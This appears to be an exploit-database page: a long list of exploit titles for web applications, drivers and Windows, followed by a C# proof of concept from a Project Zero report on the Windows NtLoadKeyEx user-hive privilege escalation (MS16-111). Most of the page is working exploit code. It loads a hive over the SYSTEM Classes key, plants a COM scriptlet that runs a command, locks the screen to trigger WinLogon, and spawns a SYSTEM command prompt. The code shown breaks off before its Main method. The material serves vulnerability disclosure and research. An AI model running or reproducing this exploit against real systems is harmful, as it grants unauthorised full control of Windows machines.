
11 new exploits Berlios gpsd 2.7.x - Remote Format String Berlios GPSD 2.7.x - Remote Format String bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1) boastMachine 3.1 - (mail.php id) SQL Injection BoastMachine 3.1 - 'mail.php' id SQL Injection BIGACE 2.4 - Multiple Remote File Inclusion BigACE 2.4 - Multiple Remote File Inclusion attachmax dolphin 2.1.0 - Multiple Vulnerabilities Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH) AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH) BIGACE CMS 2.5 - 'Username' SQL Injection BigACE CMS 2.5 - 'Username' SQL Injection BIGACE CMS 2.6 - (cmd) Local File Inclusion BigACE CMS 2.6 - (cmd) Local File Inclusion Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation DistCC Daemon - Command Execution (Metasploit) DistCC Daemon - Command Execution (Metasploit) (1) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1) Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption bitrix site manager 4.0.5 - Remote File Inclusion Bitrix Site Manager 4.0.5 - Remote File Inclusion boastMachine 3.1 - Arbitrary File Upload BoastMachine 3.1 - Arbitrary File Upload blog system 1.5 - Multiple Vulnerabilities Blog System 1.5 - Multiple Vulnerabilities b2b gold script - 'id' SQL Injection B2B Gold Script - 'id' SQL Injection TinyBrowser - Arbitrary File Upload Wordpress Plugin TinyBrowser - Arbitrary File Upload Nginx http server 0.6.36 - Directory Traversal Nginx 0.6.36 - Directory Traversal atomic photo album 1.0.2 - Multiple Vulnerabilities Atomic Photo Album 1.0.2 - Multiple Vulnerabilities Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1) Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC) BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC) bitweaver 2.8.1 - Persistent Cross-Site Scripting Bitweaver 2.8.1 - Persistent Cross-Site Scripting bitweaver 2.8.0 - Multiple Vulnerabilities Bitweaver 2.8.0 - Multiple Vulnerabilities Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2) Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2) DistCC Daemon - Command Execution (Metasploit) DistCC Daemon - Command Execution (Metasploit) (2) Bigace 2.7.5 - Arbitrary File Upload BigACE 2.7.5 - Arbitrary File Upload atutor 2.0.2 - Multiple Vulnerabilities ATutor 2.0.2 - Multiple Vulnerabilities boastMachine 3.1 - Cross-Site Request Forgery (Add Admin) BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin) Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111) atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution Macro Expert 4.0 - Multiple Privilege Escalations axigen mail server 8.0.1 - Persistent Cross-Site Scripting Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation Joomla! Component Event Booking 2.10.1 - SQL Injection NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation bitweaver 2.8.1 - Multiple Vulnerabilities Bitweaver 2.8.1 - Multiple Vulnerabilities Contrexx CMS egov Module 1.0.0 - SQL Injection Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111) White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting atutor 1.2 - Multiple Vulnerabilities ATutor 1.2 - Multiple Vulnerabilities Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection Clockstone and other CMSMasters Theme - Arbitrary File Upload Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload Nginx HTTP Server 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit) Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit) BuilderEngine 3.5.0 - Arbitrary File Upload PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution Bigace CMS 2.7.8 - Cross-Site Request Forgery (Add Admin) BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin) BoastMachine 3.1 - admin.php Cross-Site Scripting BoastMachine 3.1 - 'admin.php' Cross-Site Scripting Western Digital Arkeia - Remote Code Execution (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) (1) Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery boastMachine 2.8 - 'index.php' Local File Inclusion BoastMachine 2.8 - 'index.php' Local File Inclusion TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting boastMachine 3.1 - 'key' Parameter Cross-Site Scripting BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities Creative Contact Form 0.9.7 - Arbitrary File Upload Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting Paid Memberships Pro 1.7.14.2 - Directory Traversal Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal DukaPress 2.5.2 - Directory Traversal Wordpress Plugin DukaPress 2.5.2 - Directory Traversal Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting Duplicator 0.5.8 - Privilege Escalation Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload Shareaholic 7.6.0.3 - Cross-Site Scripting Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting Paypal Currency Converter Basic For WooCommerce - File Read Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting Western Digital Arkeia - Remote Code Execution (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) (2) Multiple WordPress Themes WPScientist - Arbitrary File Upload Multiple WordPress WPScientist Themes - Arbitrary File Upload EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities Avast AntiVirus - X.509 Error Rendering Command Execution Avast! AntiVirus - X.509 Error Rendering Command Execution Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities Avast - OOB Write Decrypting PEncrypt Packed executables Avast - JetDb::IsExploited4x Performs Unbounded Search on Input Avast - Heap Overflow Unpacking MoleBox Archives Avast - Integer Overflow Verifying numFonts in TTC Header Avast! - OOB Write Decrypting PEncrypt Packed executables Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input Avast! - Heap Overflow Unpacking MoleBox Archives Avast! - Integer Overflow Verifying numFonts in TTC Header BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal Simple Ads Manager 2.9.4.116 - SQL Injection Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection MySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation Avast - Authenticode Parsing Memory Corruption Avast! - Authenticode Parsing Memory Corruption Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting Job Script by Scubez - Remote Code Execution Wordpress Plugin Job Script by Scubez - Remote Code Execution Premium SEO Pack 1.9.1.3 - wp_options Overwrite Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite Ocomon 2.0 - SQL Injection
488 lines
No EOL
16 KiB
C#
Executable file
488 lines
No EOL
16 KiB
C#
Executable file
/*
|
||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=865
|
||
|
||
Windows: NtLoadKeyEx User Hive Attachment Point EoP
|
||
Platform: Windows 10 10586 (32/64) and 8.1 Update 2, not tested Windows 7
|
||
Class: Elevation of Privilege
|
||
|
||
Summary:
|
||
The NtLoadKeyEx system call allows an unprivileged user to load registry hives outside of the \Registry\A hidden attachment point which can be used to elevate privileges.
|
||
|
||
Description:
|
||
|
||
Windows Vista and above support loading per-user registry hives. Normally calling NtLoadKeyEx would require Backup/Restore privileges to do this making it useless for the average user.. However per-user hives are permitted from a normal user. When calling the Win32 API RegLoadAppKey the hive is loaded under \Registry\A which is a hidden attachment key and doesn’t provide any obvious benefit from an EoP perspective (especially as the root name is a random GUID). However it turns out that you can load the per-user hive to any attachment point such as \Registry\User or \Registry\Machine. Interestingly this works even as a sandboxed user, so it would be an escape out of EPM/Edge/Bits of Chrome etc.
|
||
|
||
So how can we exploit this? The simplest way I’ve found is to register the hive as the local system "Classes" key. This isn’t registered by default, however a quick inspection indicates that local system does indeed refer to this key when trying to access COM registration information. So by putting an appropriate registration in \Registry\User\S-1-5-18_Classes it will be loaded as a local system component and privileged execution is achieved.
|
||
|
||
Proof of Concept:
|
||
|
||
I’ve provided a PoC as a C# source code file. You need to compile it first. It uses the issue with NtLoadKeyEx to map a custom hive over the local system’s Classes key. It then registers a type library which is loaded when WinLogon is signaled. I signal WinLogon by locking the screen. It abuses the fact that registered type library paths when passed to LoadTypeLib can be a COM moniker. So I register a COM scriptlet moniker which will be bound when LoadTypeLib parses it, this causes a local scriptlet file to be executed which respawns the original binary to spawn an interactive command prompt. By doing it this way it works on 32 bit and 64 bit without any changes.
|
||
|
||
Note that it doesn’t need to use the Lock Screen, just this was the first technique I found. Many system services are loading data out of the registry hive, it would just be a case of finding something which could be trivially triggered by the application. In any case imo the bug is the behaviour of NtLoadKeyEx, not how I exploit it.
|
||
|
||
1) Compile the C# source code file.
|
||
2) Execute the PoC executable as a normal user.
|
||
3) The PoC should lock the screen. You’ll need to unlock again (do not log out).
|
||
4) If successful a system level command prompt should be available on the user’s desktop when you unlock.
|
||
|
||
Expected Result:
|
||
You can’t create a per-user hive outside of the hidden attachment point.
|
||
|
||
Observed Result:
|
||
Well obviously you can.
|
||
*/
|
||
|
||
using Microsoft.Win32;
|
||
using Microsoft.Win32.SafeHandles;
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.IO;
|
||
using System.Reflection;
|
||
using System.Runtime.InteropServices;
|
||
using System.Text;
|
||
using System.Threading;
|
||
|
||
namespace Poc_NtLoadKeyEx_EoP
|
||
{
|
||
class Program
|
||
{
|
||
[Flags]
|
||
public enum AttributeFlags : uint
|
||
{
|
||
None = 0,
|
||
Inherit = 0x00000002,
|
||
Permanent = 0x00000010,
|
||
Exclusive = 0x00000020,
|
||
CaseInsensitive = 0x00000040,
|
||
OpenIf = 0x00000080,
|
||
OpenLink = 0x00000100,
|
||
KernelHandle = 0x00000200,
|
||
ForceAccessCheck = 0x00000400,
|
||
IgnoreImpersonatedDevicemap = 0x00000800,
|
||
DontReparse = 0x00001000,
|
||
}
|
||
|
||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
||
public sealed class UnicodeString
|
||
{
|
||
ushort Length;
|
||
ushort MaximumLength;
|
||
[MarshalAs(UnmanagedType.LPWStr)]
|
||
string Buffer;
|
||
|
||
public UnicodeString(string str)
|
||
{
|
||
Length = (ushort)(str.Length * 2);
|
||
MaximumLength = (ushort)((str.Length * 2) + 1);
|
||
Buffer = str;
|
||
}
|
||
}
|
||
|
||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
||
public sealed class ObjectAttributes : IDisposable
|
||
{
|
||
int Length;
|
||
IntPtr RootDirectory;
|
||
IntPtr ObjectName;
|
||
AttributeFlags Attributes;
|
||
IntPtr SecurityDescriptor;
|
||
IntPtr SecurityQualityOfService;
|
||
|
||
private static IntPtr AllocStruct(object s)
|
||
{
|
||
int size = Marshal.SizeOf(s);
|
||
IntPtr ret = Marshal.AllocHGlobal(size);
|
||
Marshal.StructureToPtr(s, ret, false);
|
||
return ret;
|
||
}
|
||
|
||
private static void FreeStruct(ref IntPtr p, Type struct_type)
|
||
{
|
||
Marshal.DestroyStructure(p, struct_type);
|
||
Marshal.FreeHGlobal(p);
|
||
p = IntPtr.Zero;
|
||
}
|
||
|
||
public ObjectAttributes(string object_name)
|
||
{
|
||
Length = Marshal.SizeOf(this);
|
||
if (object_name != null)
|
||
{
|
||
ObjectName = AllocStruct(new UnicodeString(object_name));
|
||
}
|
||
Attributes = AttributeFlags.None;
|
||
}
|
||
|
||
public void Dispose()
|
||
{
|
||
if (ObjectName != IntPtr.Zero)
|
||
{
|
||
FreeStruct(ref ObjectName, typeof(UnicodeString));
|
||
}
|
||
GC.SuppressFinalize(this);
|
||
}
|
||
|
||
~ObjectAttributes()
|
||
{
|
||
Dispose();
|
||
}
|
||
}
|
||
|
||
[Flags]
|
||
public enum LoadKeyFlags
|
||
{
|
||
None = 0,
|
||
AppKey = 0x10,
|
||
Exclusive = 0x20,
|
||
Unknown800 = 0x800,
|
||
}
|
||
|
||
[Flags]
|
||
public enum GenericAccessRights : uint
|
||
{
|
||
None = 0,
|
||
GenericRead = 0x80000000,
|
||
GenericWrite = 0x40000000,
|
||
GenericExecute = 0x20000000,
|
||
GenericAll = 0x10000000,
|
||
Delete = 0x00010000,
|
||
ReadControl = 0x00020000,
|
||
WriteDac = 0x00040000,
|
||
WriteOwner = 0x00080000,
|
||
Synchronize = 0x00100000,
|
||
MaximumAllowed = 0x02000000,
|
||
}
|
||
|
||
public class NtException : ExternalException
|
||
{
|
||
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
|
||
private static extern IntPtr GetModuleHandle(string modulename);
|
||
|
||
[Flags]
|
||
enum FormatFlags
|
||
{
|
||
AllocateBuffer = 0x00000100,
|
||
FromHModule = 0x00000800,
|
||
FromSystem = 0x00001000,
|
||
IgnoreInserts = 0x00000200
|
||
}
|
||
|
||
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
|
||
private static extern int FormatMessage(
|
||
FormatFlags dwFlags,
|
||
IntPtr lpSource,
|
||
int dwMessageId,
|
||
int dwLanguageId,
|
||
out IntPtr lpBuffer,
|
||
int nSize,
|
||
IntPtr Arguments
|
||
);
|
||
|
||
[DllImport("kernel32.dll")]
|
||
private static extern IntPtr LocalFree(IntPtr p);
|
||
|
||
private static string StatusToString(int status)
|
||
{
|
||
IntPtr buffer = IntPtr.Zero;
|
||
try
|
||
{
|
||
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
|
||
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
|
||
{
|
||
return Marshal.PtrToStringUni(buffer);
|
||
}
|
||
}
|
||
finally
|
||
{
|
||
if (buffer != IntPtr.Zero)
|
||
{
|
||
LocalFree(buffer);
|
||
}
|
||
}
|
||
return String.Format("Unknown Error: 0x{0:X08}", status);
|
||
}
|
||
|
||
public NtException(int status) : base(StatusToString(status))
|
||
{
|
||
}
|
||
}
|
||
|
||
public static void StatusToNtException(int status)
|
||
{
|
||
if (status < 0)
|
||
{
|
||
throw new NtException(status);
|
||
}
|
||
}
|
||
|
||
[DllImport("ntdll.dll")]
|
||
public static extern int NtLoadKeyEx(ObjectAttributes DestinationName, ObjectAttributes FileName, LoadKeyFlags Flags,
|
||
IntPtr TrustKeyHandle, IntPtr EventHandle, GenericAccessRights DesiredAccess, out SafeRegistryHandle KeyHandle, int Unused);
|
||
|
||
static string scriptlet_code = @"<?xml version='1.0'?>
|
||
<package>
|
||
<component id='giffile'>
|
||
<registration
|
||
description='Dummy'
|
||
progid='giffile'
|
||
version='1.00'
|
||
remotable='True'>
|
||
|
||
</registration>
|
||
<script language='JScript'>
|
||
<![CDATA[
|
||
new ActiveXObject('Wscript.Shell').exec('%CMDLINE%');
|
||
]]>
|
||
</script>
|
||
</component>
|
||
</package>
|
||
";
|
||
|
||
public enum TokenInformationClass
|
||
{
|
||
TokenSessionId = 12
|
||
}
|
||
|
||
[DllImport("ntdll.dll")]
|
||
public static extern int NtClose(IntPtr handle);
|
||
|
||
[DllImport("ntdll.dll", CharSet = CharSet.Unicode)]
|
||
public static extern int NtOpenProcessTokenEx(
|
||
IntPtr ProcessHandle,
|
||
GenericAccessRights DesiredAccess,
|
||
AttributeFlags HandleAttributes,
|
||
out IntPtr TokenHandle);
|
||
|
||
public sealed class SafeKernelObjectHandle
|
||
: SafeHandleZeroOrMinusOneIsInvalid
|
||
{
|
||
public SafeKernelObjectHandle()
|
||
: base(true)
|
||
{
|
||
}
|
||
|
||
public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)
|
||
: base(owns_handle)
|
||
{
|
||
SetHandle(handle);
|
||
}
|
||
|
||
protected override bool ReleaseHandle()
|
||
{
|
||
if (!IsInvalid)
|
||
{
|
||
NtClose(this.handle);
|
||
this.handle = IntPtr.Zero;
|
||
return true;
|
||
}
|
||
return false;
|
||
}
|
||
}
|
||
|
||
public enum TokenType
|
||
{
|
||
Primary = 1,
|
||
Impersonation = 2
|
||
}
|
||
|
||
[DllImport("ntdll.dll", CharSet = CharSet.Unicode)]
|
||
public static extern int NtDuplicateToken(
|
||
IntPtr ExistingTokenHandle,
|
||
GenericAccessRights DesiredAccess,
|
||
ObjectAttributes ObjectAttributes,
|
||
bool EffectiveOnly,
|
||
TokenType TokenType,
|
||
out IntPtr NewTokenHandle
|
||
);
|
||
|
||
public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token)
|
||
{
|
||
IntPtr new_token;
|
||
|
||
using (ObjectAttributes obja = new ObjectAttributes(null))
|
||
{
|
||
StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(),
|
||
GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token));
|
||
return new SafeKernelObjectHandle(new_token, true);
|
||
}
|
||
}
|
||
|
||
public static SafeKernelObjectHandle OpenProcessToken()
|
||
{
|
||
IntPtr new_token;
|
||
StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1),
|
||
GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token));
|
||
using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true))
|
||
{
|
||
return DuplicateToken(ret);
|
||
}
|
||
}
|
||
|
||
[DllImport("ntdll.dll")]
|
||
public static extern int NtSetInformationToken(
|
||
SafeKernelObjectHandle TokenHandle,
|
||
TokenInformationClass TokenInformationClass,
|
||
byte[] TokenInformation,
|
||
int TokenInformationLength);
|
||
|
||
public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id)
|
||
{
|
||
byte[] buffer = BitConverter.GetBytes(session_id);
|
||
NtSetInformationToken(token, TokenInformationClass.TokenSessionId,
|
||
buffer, buffer.Length);
|
||
}
|
||
|
||
static Tuple<EventWaitHandle, EventWaitHandle> GetEvents()
|
||
{
|
||
EventWaitHandle user_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_user_wait");
|
||
EventWaitHandle sys_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_sys_wait");
|
||
|
||
return new Tuple<EventWaitHandle, EventWaitHandle>(user_ev, sys_ev);
|
||
}
|
||
|
||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
||
struct STARTUPINFO
|
||
{
|
||
public Int32 cb;
|
||
public string lpReserved;
|
||
public string lpDesktop;
|
||
public string lpTitle;
|
||
public Int32 dwX;
|
||
public Int32 dwY;
|
||
public Int32 dwXSize;
|
||
public Int32 dwYSize;
|
||
public Int32 dwXCountChars;
|
||
public Int32 dwYCountChars;
|
||
public Int32 dwFillAttribute;
|
||
public Int32 dwFlags;
|
||
public Int16 wShowWindow;
|
||
public Int16 cbReserved2;
|
||
public IntPtr lpReserved2;
|
||
public IntPtr hStdInput;
|
||
public IntPtr hStdOutput;
|
||
public IntPtr hStdError;
|
||
}
|
||
|
||
[StructLayout(LayoutKind.Sequential)]
|
||
internal struct PROCESS_INFORMATION
|
||
{
|
||
public IntPtr hProcess;
|
||
public IntPtr hThread;
|
||
public int dwProcessId;
|
||
public int dwThreadId;
|
||
}
|
||
|
||
enum CreateProcessFlags
|
||
{
|
||
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
|
||
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
|
||
CREATE_NEW_CONSOLE = 0x00000010,
|
||
CREATE_NEW_PROCESS_GROUP = 0x00000200,
|
||
CREATE_NO_WINDOW = 0x08000000,
|
||
CREATE_PROTECTED_PROCESS = 0x00040000,
|
||
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
|
||
CREATE_SEPARATE_WOW_VDM = 0x00000800,
|
||
CREATE_SHARED_WOW_VDM = 0x00001000,
|
||
CREATE_SUSPENDED = 0x00000004,
|
||
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
|
||
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
|
||
DEBUG_PROCESS = 0x00000001,
|
||
DETACHED_PROCESS = 0x00000008,
|
||
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
|
||
INHERIT_PARENT_AFFINITY = 0x00010000
|
||
}
|
||
|
||
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
|
||
static extern bool CreateProcessAsUser(
|
||
IntPtr hToken,
|
||
string lpApplicationName,
|
||
string lpCommandLine,
|
||
IntPtr lpProcessAttributes,
|
||
IntPtr lpThreadAttributes,
|
||
bool bInheritHandles,
|
||
CreateProcessFlags dwCreationFlags,
|
||
IntPtr lpEnvironment,
|
||
string lpCurrentDirectory,
|
||
ref STARTUPINFO lpStartupInfo,
|
||
out PROCESS_INFORMATION lpProcessInformation);
|
||
|
||
static void SpawnInteractiveCmd(int sessionid)
|
||
{
|
||
Tuple<EventWaitHandle, EventWaitHandle> events = GetEvents();
|
||
Console.WriteLine("Got Events");
|
||
events.Item1.Set();
|
||
events.Item2.WaitOne();
|
||
SafeKernelObjectHandle token = OpenProcessToken();
|
||
SetTokenSessionId(token, sessionid);
|
||
|
||
STARTUPINFO startInfo = new STARTUPINFO();
|
||
startInfo.cb = Marshal.SizeOf(startInfo);
|
||
PROCESS_INFORMATION procInfo;
|
||
|
||
CreateProcessAsUser(token.DangerousGetHandle(), null, "cmd.exe",
|
||
IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo);
|
||
}
|
||
|
||
[DllImport("user32.dll")]
|
||
static extern bool LockWorkStation();
|
||
|
||
static void DoExploit()
|
||
{
|
||
Console.WriteLine("{0}", Assembly.GetCallingAssembly().Location);
|
||
Tuple<EventWaitHandle, EventWaitHandle> events = GetEvents();
|
||
|
||
string cmdline = String.Format(@"""{0}"" {1}",
|
||
Assembly.GetCallingAssembly().Location.Replace('\\', '/'), Process.GetCurrentProcess().SessionId);
|
||
string scriptlet_path = Path.GetFullPath("dummy.sct");
|
||
File.WriteAllText(scriptlet_path, scriptlet_code.Replace("%CMDLINE%", cmdline), Encoding.ASCII);
|
||
Console.WriteLine("{0}", scriptlet_path);
|
||
string scriptlet_url = "script:" + new Uri(scriptlet_path).AbsoluteUri;
|
||
Console.WriteLine("{0}", scriptlet_url);
|
||
string reg_name = @"\Registry\User\S-1-5-18_Classes";
|
||
string path = @"\??\" + Path.GetFullPath("dummy.hiv");
|
||
File.Delete("dummy.hiv");
|
||
ObjectAttributes KeyName = new ObjectAttributes(reg_name);
|
||
ObjectAttributes FileName = new ObjectAttributes(path);
|
||
SafeRegistryHandle keyHandle;
|
||
|
||
StatusToNtException(NtLoadKeyEx(KeyName,
|
||
FileName, LoadKeyFlags.AppKey, IntPtr.Zero,
|
||
IntPtr.Zero, GenericAccessRights.GenericAll, out keyHandle, 0));
|
||
|
||
RegistryKey key = RegistryKey.FromHandle(keyHandle);
|
||
RegistryKey typelib_key = key.CreateSubKey("TypeLib").CreateSubKey("{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}").CreateSubKey("2.0").CreateSubKey("0");
|
||
typelib_key.CreateSubKey("win32").SetValue(null, scriptlet_url);
|
||
typelib_key.CreateSubKey("win64").SetValue(null, scriptlet_url);
|
||
|
||
Console.WriteLine("Handle: {0} - Key {1} - Path {2}", keyHandle.DangerousGetHandle(), reg_name, path);
|
||
Console.WriteLine("Lock screen and re-login.");
|
||
LockWorkStation();
|
||
events.Item1.WaitOne();
|
||
typelib_key.DeleteSubKey("win32");
|
||
typelib_key.DeleteSubKey("win64");
|
||
File.Delete(scriptlet_path);
|
||
typelib_key.Close();
|
||
key.Close();
|
||
events.Item2.Set();
|
||
}
|
||
|
||
